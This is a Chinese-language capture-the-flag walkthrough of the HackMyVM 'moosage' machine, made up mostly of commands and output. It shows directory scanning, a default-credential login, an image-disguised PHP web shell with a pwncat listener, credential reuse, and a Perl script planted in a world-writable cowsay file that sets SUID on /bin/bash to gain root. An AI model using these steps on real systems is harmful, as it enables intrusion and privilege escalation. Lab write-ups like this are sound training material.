46.moosage
1. 基本信息^toc
2. 信息收集
2.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# nmap 192.168.56.22 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 05:27 EST
Nmap scan report for 192.168.56.22
Host is up (0.0011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 08:00:27:AE:F2:FE (Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 2.29 seconds
2.2. 目录扫描
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# dirsearch -u http://192.168.56.22
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/moosage/reports/http_192.168.56.22/_24-12-23_05-32-23.txt
Target: http://192.168.56.22/
[05:32:23] Starting:
[05:32:29] 301 - 185B - /blog -> http://192.168.56.22/blog/
[05:32:29] 200 - 10KB - /blog/
Task Completed
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# dirsearch -u http://192.168.56.22/blog/
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460
Output File: /root/Desktop/hmv/moosage/reports/http_192.168.56.22/_blog__24-12-23_05-33-02.txt
Target: http://192.168.56.22/
[05:33:02] Starting: blog/
[05:33:02] 301 - 185B - /blog/.git -> http://192.168.56.22/blog/.git/
[05:33:02] 403 - 571B - /blog/.git/
[05:33:02] 200 - 254B - /blog/.git/config
[05:33:02] 200 - 73B - /blog/.git/description
[05:33:02] 200 - 23B - /blog/.git/HEAD
[05:33:02] 403 - 571B - /blog/.git/hooks/
[05:33:02] 403 - 571B - /blog/.git/branches/
[05:33:02] 200 - 10KB - /blog/.git/index
[05:33:02] 403 - 571B - /blog/.git/info/
[05:33:02] 200 - 240B - /blog/.git/info/exclude
[05:33:02] 200 - 168B - /blog/.git/logs/HEAD
[05:33:02] 301 - 185B - /blog/.git/logs/refs -> http://192.168.56.22/blog/.git/logs/refs/
[05:33:02] 301 - 185B - /blog/.git/logs/refs/heads -> http://192.168.56.22/blog/.git/logs/refs/heads/
[05:33:02] 301 - 185B - /blog/.git/logs/refs/remotes -> http://192.168.56.22/blog/.git/logs/refs/remotes/
[05:33:02] 301 - 185B - /blog/.git/logs/refs/remotes/origin -> http://192.168.56.22/blog/.git/logs/refs/remotes/origin/
[05:33:02] 403 - 571B - /blog/.git/objects/
[05:33:02] 403 - 571B - /blog/.git/refs/
[05:33:02] 200 - 41B - /blog/.git/refs/heads/master
[05:33:02] 200 - 1KB - /blog/.git/packed-refs
[05:33:02] 200 - 168B - /blog/.git/logs/refs/heads/master
[05:33:02] 200 - 168B - /blog/.git/logs/refs/remotes/origin/HEAD
[05:33:02] 301 - 185B - /blog/.git/refs/heads -> http://192.168.56.22/blog/.git/refs/heads/
[05:33:02] 301 - 185B - /blog/.git/refs/remotes -> http://192.168.56.22/blog/.git/refs/remotes/
[05:33:02] 403 - 571B - /blog/.git/logs/
[05:33:02] 200 - 32B - /blog/.git/refs/remotes/origin/HEAD
[05:33:02] 301 - 185B - /blog/.git/refs/tags -> http://192.168.56.22/blog/.git/refs/tags/
[05:33:02] 301 - 185B - /blog/.git/refs/remotes/origin -> http://192.168.56.22/blog/.git/refs/remotes/origin/
[05:33:02] 200 - 171B - /blog/.gitignore
[05:33:02] 200 - 300B - /blog/.htaccess
[05:33:07] 200 - 37B - /blog/ajax.php
[05:33:07] 301 - 185B - /blog/app -> http://192.168.56.22/blog/app/
[05:33:07] 403 - 571B - /blog/app/
[05:33:09] 200 - 0B - /blog/common.php
[05:33:09] 200 - 1KB - /blog/config.ini
[05:33:10] 301 - 185B - /blog/data -> http://192.168.56.22/blog/data/
[05:33:10] 403 - 571B - /blog/data/
[05:33:10] 200 - 754B - /blog/docker-compose.yml
[05:33:10] 200 - 680B - /blog/Dockerfile
[05:33:11] 200 - 1KB - /blog/favicon.ico
[05:33:13] 200 - 34KB - /blog/LICENSE
[05:33:17] 200 - 8KB - /blog/README.md
[05:33:18] 200 - 25B - /blog/robots.txt
[05:33:19] 301 - 185B - /blog/static -> http://192.168.56.22/blog/static/
Task Completed
获取到了一个 /blog/ 路由
2.3. 源码获取
直接用页面源代码去github上搜索看能不能找到源码
在项目文件夹的 config.ini 里面可以获取到默认密码
[admin]
force_login = true
nick = demo
pass = demo
[database]
db_connection = sqlite
;sqlite_db = data/sqlite.db
;[database]
;db_connection = mysql
;mysql_socket = /tmp/mysql.sock
;mysql_host = localhost
;mysql_port = 3306
;mysql_user = root
;mysql_pass = root
;db_name = blog
;[database]
;db_connection = postgres
;postgres_socket = /tmp/postgres.sock
;postgres_host = localhost
;postgres_port = 5432
;postgres_user = root
;postgres_pass = root
;db_name = blog
使用默认管理员账号密码登录后台
登录进来后,我们可以进行留言,但没有上传文件 只能上传图片
3. 图片马弹shell
尝试上传一个图片马试试
Png不行 。换成gif试一下 成功上传
访问路径 http://192.168.56.22/blog/data/i/6d6N.php
成功。
反弹shell
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# pwncat-cs -lp 1234
[09:15:58] Welcome to pwncat 🐈! __main__.py:164
[09:16:07] received connection from 192.168.56.22:56926 bind.py:84
[09:16:07] 192.168.56.22:56926: registered new host w/ db manager.py:957
(local) pwncat$
(remote) www-data@moosage:/var/www/html/blog/data/i$ whoami
www-data
(remote) www-data@moosage:/var/www/html/blog/data/i$
4. 提权baca用户
进来后擦看 config.ini 可以获取到mysql的账号密码
(remote) www-data@moosage:/var/www/html/blog$ cat config.ini
[database]
db_connection = sqlite
;sqlite_db = data/sqlite.db
;[database]
db_connection = mysql
mysql_socket = /run/mysqld/mysqld.sock
mysql_host = localhost
mysql_port = 3306
mysql_user = baca
mysql_pass = youareinsane
db_name = moosage
数据库收集信息
(remote) www-data@moosage:/var/www/html/blog$ mysql -ubaca -pyouareinsane
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 51
Server version: 10.3.27-MariaDB-0+deb10u1 Debian 10
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| moosage |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [moosage]> show tables;
+-------------------+
| Tables_in_moosage |
+-------------------+
| images |
| posts |
+-------------------+
2 rows in set (0.000 sec)
MariaDB [moosage]> select * from posts;
+----+-------------+-------------+---------+---------+----------+---------+--------------+---------+---------------------+--------+
| id | text | plain_text | feeling | persons | location | content | content_type | privacy | datetime | status |
+----+-------------+-------------+---------+---------+----------+---------+--------------+---------+---------------------+--------+
| 1 | Super TEST! | Super TEST! | | | | | | public | 2021-04-22 14:30:01 | 1 |
+----+-------------+-------------+---------+---------+----------+---------+--------------+---------+---------------------+--------+
1 row in set (0.000 sec)
MariaDB [moosage]> select * from iages;
ERROR 1146 (42S02): Table 'moosage.iages' doesn't exist
MariaDB [moosage]> select * from images;
+----+-----------+-----------------+-----------------+------+----------------------------------+---------------------+--------+
| id | name | path | thumb | type | md5 | datetime | status |
+----+-----------+-----------------+-----------------+------+----------------------------------+---------------------+--------+
| 1 | a.png.php | data/i/1Qkz.php | data/t/1Qkz.php | php | 2e0d2d57db0657f87ecb595e102be2b5 | 2024-12-23 09:08:42 | 1 |
| 2 | a.png.php | NULL | NULL | php | e0e6d0223f0ee718cc9c2f6d9cb9dbe7 | 2024-12-23 09:11:31 | 0 |
| 3 | a.png.php | NULL | NULL | php | 072faae5bb7cf8b20677424021e215e2 | 2024-12-23 09:12:01 | 0 |
| 4 | a.gif.php | NULL | NULL | php | 4dec43f548b786e903cad2b5beed121a | 2024-12-23 09:12:34 | 0 |
| 5 | a.gif.php | NULL | NULL | php | 4dec43f548b786e903cad2b5beed121a | 2024-12-23 09:12:41 | 0 |
| 6 | a.gif.php | data/i/6d6N.php | data/t/6d6N.php | php | ccf96e50f5a98a3a50bb5e963e1af038 | 2024-12-23 09:13:29 | 1 |
+----+-----------+-----------------+-----------------+------+----------------------------------+---------------------+--------+
6 rows in set (0.000 sec)
发现里面没有什么可以利用的
使用这个 baca 用户的账号密码发现可以直接切换账户
(remote) www-data@moosage:/var/www/html/blog$ su baca
Password:
baca@moosage:/var/www/html/blog$
5. 提权root
baca@moosage:~$ sh flag.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *,
-------------------------
PWNED HOST: moosage
PWNED DATE: Mon 23 Dec 2024 09:25:14 AM EST
WHOAMI: uid=1000(baca) gid=1000(baca) groups=1000(baca),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
FLAG: hmvmessageme
------------------------
5.1. 修改ssh登录脚本提权
先在 baca 用户目录写入公钥
baca@moosage:~$ mkdir .ssh
baca@moosage:~$ chmod 700 .ssh/
baca@moosage:~$ cd .ssh/
baca@moosage:~/.ssh$ nano authorized_keys
然后ssh连接上来
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# ssh -i /root/.ssh/id_rsa baca@192.168.56.22
The authenticity of host '192.168.56.22 (192.168.56.22)' can't be established.
ED25519 key fingerprint is SHA256:e00X2Lw0BXoFelHR9ZRP3JogiBvwujMOAvxKJutaAMk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.22' (ED25519) to the list of known hosts.
___________________________
< WELCOME TO MOOSAGE SYSTEM >
---------------------------
\
\
,__, | |
(oo)\| |___
(__)\| | )\_
| |_w | \
| | || *
Cower....
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Apr 22 14:04:44 2021 from 192.168.1.58
baca@moosage:~$
从这个牛牛说话就能联想到ssh登录时使用了 Cowsay
我们找一下这个cowsay有很多种动物可以选择。但是我每次登录都是牛牛在说话。那么我们只需要找到牛牛的配置文件即可
baca@moosage:/usr/share/cowsay/cows$ find / -name cow* 2>/dev/null
/usr/share/cowsay/cows/cower.cow
baca@moosage:/usr/share/cowsay/cows$ ls -la
total 192
drwxr-xr-x 2 root root 4096 Apr 22 2021 .
drwxr-xr-x 3 root root 4096 Apr 22 2021 ..
-rw-rw-rw- 1 root root 115 Feb 3 2019 apt.cow
-rw-rw-rw- 1 root root 310 Aug 14 1999 bud-frogs.cow
-rw-rw-rw- 1 root root 123 Aug 14 1999 bunny.cow
-rw-rw-rw- 1 root root 1127 Feb 3 2019 calvin.cow
-rw-rw-rw- 1 root root 480 Aug 14 1999 cheese.cow
-rw-rw-rw- 1 root root 181 Feb 3 2019 cock.cow
-rw-rw-rw- 1 root root 230 Aug 14 1999 cower.cow
我们可以修改 cower.cow 然后ssh登录 实现提权
.cow文件的本质是Perl脚本
修改 cower.cow 内容
#!/usr/bin/perl
use strict; use warnings;
# 设置 SUID 位到 /bin/bash
my $file = "/bin/bash"; my $permissions = 04755; # 4 表示 SUID 位
# 更改文件权限
if (chmod $permissions, $file) { print "Successfully set SUID bit on $file.\n";
} else {
die "Failed to set SUID bit on $file: $!\n";
}
┌──(root㉿kali)-[~/Desktop/hmv/moosage]
└─# ssh -i /root/.ssh/id_rsa baca@192.168.56.22
Successfully set SUID bit on /bin/bash.
___________________________
< WELCOME TO MOOSAGE SYSTEM >
---------------------------
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Dec 23 10:02:42 2024 from 192.168.56.6
-bash-5.0$ ls -l /bin/bash
-rwsr-xr-x 1 root root 1168776 Apr 18 2019 /bin/bash
-bash-5.0$ bash -p
bash-5.0#
bash-5.0# whoami
root
bash-5.0# sh flag.sh
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *,
-------------------------
PWNED HOST: moosage
PWNED DATE: Mon 23 Dec 2024 10:04:58 AM EST
WHOAMI: uid=1000(baca) gid=1000(baca) groups=1000(baca),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
FLAG: Keep trying.
------------------------